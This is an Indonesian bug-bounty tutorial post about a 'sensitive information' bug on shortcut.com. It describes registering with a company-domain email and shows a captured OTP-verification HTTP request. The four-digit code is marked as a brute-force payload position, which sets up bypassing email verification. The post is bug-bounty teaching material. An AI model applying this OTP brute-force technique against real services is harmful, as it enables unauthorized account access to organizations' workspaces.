Bug Sensitive Information adalah kerentanan dimana berdampak pada kebocoran informasi yang bersifat rahasia dimana tidak sembarang orang boleh mengaksesnya atau mendapatkannya. Jika kalian sering melihat postingan dari fanspage nakanosec kalian pasti pernah melihat salah satu postingan mimin tentang bug bounty tips dimana ketika anda mendapatkan regiter form kalian coba mendaftar akun dengan email berdomain milik situs yang kita pentest. Hal ini bukan cuma bohong belaka, banyak kasus dimana kalian mendapatkan informasi sensitif bahkan role admin saat kalian menggunakan company email. Sebelumnya maaf pada tulisan ini ga bakalan banyak penjelasan karna admin sendiri lagi banyak kesibukan, kalian bisa langsung tutorial yang saya berikan. jika ada pertanyaan silahkan tanya ke fanspage nakanosec.
Reconnaissance
- Intinya gw coba coba fitur yang ada di situsnya dan gw dapetin kesimpulang kayak gini:
- Situs ini adalah situs semacam slack yaitu situs buat memudahkan komunitas buat membagi tasknya kepada member" yang lain
- Dalam sebuah komunitas harus ada satu admin yang nantinya melakukan invit kepada member membernya
- Verifikasi email menggunakan otp 4 digit
1.Go to https://shortcut.com/signup
2.Enter some company emails (ex:[email protected])
3.Click on “get started for free button”
4.You will see Request otp form like this
POST /api/private/signups/verify HTTP/1.1 Host: api.app.shortcut.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://shortcut.com/ Content-Type: application/json;charset=utf-8 Content-Length: 61 Origin: https://shortcut.com Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site {"email":"[email protected]","verification_code":"§1000§"}